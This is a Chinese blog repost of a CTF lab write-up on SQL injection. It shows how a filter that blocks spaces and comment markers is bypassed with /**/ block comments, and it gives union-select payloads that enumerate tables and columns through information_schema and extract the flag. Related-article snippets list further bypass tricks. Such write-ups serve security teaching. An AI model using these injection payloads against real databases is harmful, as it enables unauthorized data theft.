SQL注入(过滤空格和--+等注释符)

最新推荐文章于 2024-04-20 12:00:00 发布
最新推荐文章于 2024-04-20 12:00:00 发布
阅读量2.8k 收藏 2
点赞数
文章标签: 数据库 c/c++ php
原文链接:http://www.cnblogs.com/peterpan0707007/p/7501507.html
版权

1、地址:http://ctf5.shiyanbar.com/web/index_2.php(过滤了空格和--+等注释符)

思路:确定注入参数值类型,直接输入单引号,根据报错信息确定参数值类型为字符型,如下图所示。

2、正常思路输入' or '1'='1,直接报错,信息为SQLi detected!,首先猜测or被过滤,直接去掉or,继续输入' '1'='1,

仍然报错,信息为SQLi detected!,猜测空格被过滤,直接输入’or‘1’=‘1,如下图所示,确定空格被过滤。

3、尝试使用多行注释符(块注释符)、一对英文括号、换行符、加号来代替空格。

第一次尝试:快注释符/**/

输入'/**/or/**/'1'='1

输入'/**/or/**/'1'='2,无任何返回,确定块注释符可以使用。

之后分别尝试括号、换行符和加号,均不可使用,最终采用块注释符。

4、爆当前数据库中的表

'/**/union/**/select/**/concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()/**/having'1'='1

5、爆flag表中字段和值

 '/**/union/**/select/**/concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name='flag'/**/having/**/'1'='1

'/**/union/**/select/**/flag/**/from/**/flag/**/having/**/'1'='1

 

转载于:https://www.cnblogs.com/peterpan0707007/p/7501507.html

weixin_30335353
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
第十七节 绕过剔除空格SQL注入-01
09-15
在本节课程中,我们将介绍绕过剔除空格SQL注入的基础知识、去除空格的代码分析、绕过去除空格SQL注入策略、Sqlmap安全检测等内容。 基础知识介绍 在学习绕过剔除空格SQL注入前,我们需要了解一些基础知识。...
MySQL注入绕开过滤的技巧总结
12-16
首先来看GIF操作: 情况一:空格过滤 使用括号()代替空格,任何可以计算出结果的语句,都可以用括号包围起来; select * from(users)where id=...这里会联想到开始学SQL注入的时候,利用load_file或者into outfile
SQL注入-过滤空格
qq_24899063的博客
11-08 1925
SQL注入-过滤空格
SQL注入之绕过空格
nihao_ma_的博客
05-07 1915
SQL注入空格绕过技巧
sql注入(三)绕过方法及防御手段
最新发布
wangluoanquan111的博客
04-20 1029
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
Web安全之SQL注入绕过技巧
m0_74131821的博客
04-11 1635
今天跟大家聊聊SQL注入的几种绕过技巧
SQL注入绕过空格过滤
gam0n的博客
06-05 1万+
一、通过注释绕过空格注释即/**/通过注释取代空格eg:  or/**/'me'/**/=/**/'isme'二、通过括号绕过空格eg: and(1=0)
基于Sqli-Labs靶场的SQL注入-23~24关
Joker
01-04 1233
重点讲二次注入
Web安全SQL注入精讲视频.zip
04-16
目录网盘文件永久链接 ...3-1 绕过注释过滤.mp4 3-2 绕过and-or字过滤.mp4 3-3 绕过空格过滤.mp4 3-4 内联注释绕过.mp4 3-5 宽字节注入.mp4 3-6 过滤函数绕过(综合实验).mp4 4-1SQL注入防御.mp4
ctf中sql注入下的一些小技巧.doc
10-07
1. 单行注释:#、--(需要在 -- 后面留一个空格,因为有的浏览器默认会把空格过滤掉,所以在空格后加一些东西无影响) 2. 多行注释:/* */(mysql 下需要闭合) 二、判断当前库是否有字段名 在 CTF 中的题目中...
PHP和MySQL Web开发第4版pdf以及源码
10-13
6.7.1 通过继承使用private和protected访问修饰控制可见性 6.7.2 重载 6.7.3 使用final关键字禁止继承和重载 6.7.4 理解多重继承 6.7.5 实现接口 6.8 类的设计 6.9 编写类代码 6.10 理解PHP面向对象新的...
sql注入3之空格过滤
这周末在做梦的博客
10-02 1372
空格过滤的十三中脚本,由于本人比较偏爱sqlmap所以,在这里只留下了sql的空格过滤方式 –tamper “脚本名称”
SQL注入 Less26(过滤空格注释,使用不带空格的报错注入)
开心星人的博客
07-26 907
由于Windows下无法使用一些特殊字来替换空格,Linux可以,可以去Linux下尝试。这个问题,之前报错注入也出现过,可能是多出了Limit0,1导致构不成整条语句了。不能够正常的提交给服务器,所以我们必须输入他的url编码。用括号()将每个查询的部分独立开。尝试了一下,发现绕过不了空格。前后都必须要有空格,所以使用。%26是&的url编码。...
SQL注入绕过技巧
whj_study的博客
12-18 2667
1.绕过空格注释/* */,%a0):   两个空格代替一个空格,用Tab代替空格,%a0=空格: %20 %09 %0a %0b %0c %0d %a0 %00 /**/ /*!*/ 最基本的绕过方法,用注释替换空格: /* 注释 */ 使用浮点数: select * from users where id=8E0union select 1,2,3 select * from users where id=8.0 select 1,2,3 2.括号绕过空格:   如..
SQL注入 Less23(过滤注释)
开心星人的博客
07-24 1542
先去掉左右两边各一个单引号,相当于语文中的引用。因为过滤注释,我们可以手动闭合后面的单引号。尝试使用union注入,因为是有回显点的。想使用报错注入的,因为是会有报错信息的。直接使用union,来逐个测试字段数。很明显知道是单引号闭合。这部分,导致语句出错了。...
sql注入绕过方法总结
nigo134的博客
06-17 2740
转至:sql注入绕过方法总结_huanghelouzi的博客-CSDN博客_sql绕过 我们希望用户输入的 id 的值,仅仅是一个字串,传入数据库执行,但是当输入了: 2 or 1=1 时,其中的 or 1=1 是作为了 sql语句 来执行的。常用的注释有 实例 大小写绕过 常用于 的正则对大小写不敏感的情况,一般都是题目自己故意这样设计。 例如:waf过滤了关键字,可以尝试使用等绕过。 内联注释绕过 内联注释就是把一些特有的仅在MYSQL上的语句放在 中,这样这些
CTF_ctfshow_web7_sql注入过滤空格
weixin_54227009的博客
05-14 473
打开靶机 打开每一个列表,发现有一个id,所以为get传参 ok,找一下注入点 -2/**/union/**/select/**/1,2,3# 这里发现过滤空格,所以直接用/**/代替空格进行绕过,发现回显点为2,3 下面开始查库吧! -2/**/union/**/select/**/1,database(),version();# 库名:web7 版本:10.3.18-MariaDB 查表: -2/**/union/**/select/**/1,gr...
sql注入中的--+注释问题探索
热门推荐
老夏家的云
01-15 2万+
在sql-labs游戏中,经常使用--+放在最后注释多余部分,而mysql中的注释为#和-- 却不能直接使用,以前没学过mysql,一直不理解,也不知道+号的作用,今天有时间特地探索了一下,算是搞明白了其中的原因。 sql-labs闯关游戏资源及介绍见此:https://github.com/Audi-1/sqli-labs 第一关示例: 在源代码中加入下面两行,使网页能回显我们输入的有效...
sql 注入有哪些绕过过滤的方法
07-17
SQL注入攻击的本质是向数据库中注入恶意的SQL命令,从而达到绕过应用程序的访问控制和获取敏感数据的目的。常见的绕过过滤的方法有以下几种: 1. 使用单引号绕过过滤:应用程序通常会将用户输入的字串加上单引号...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值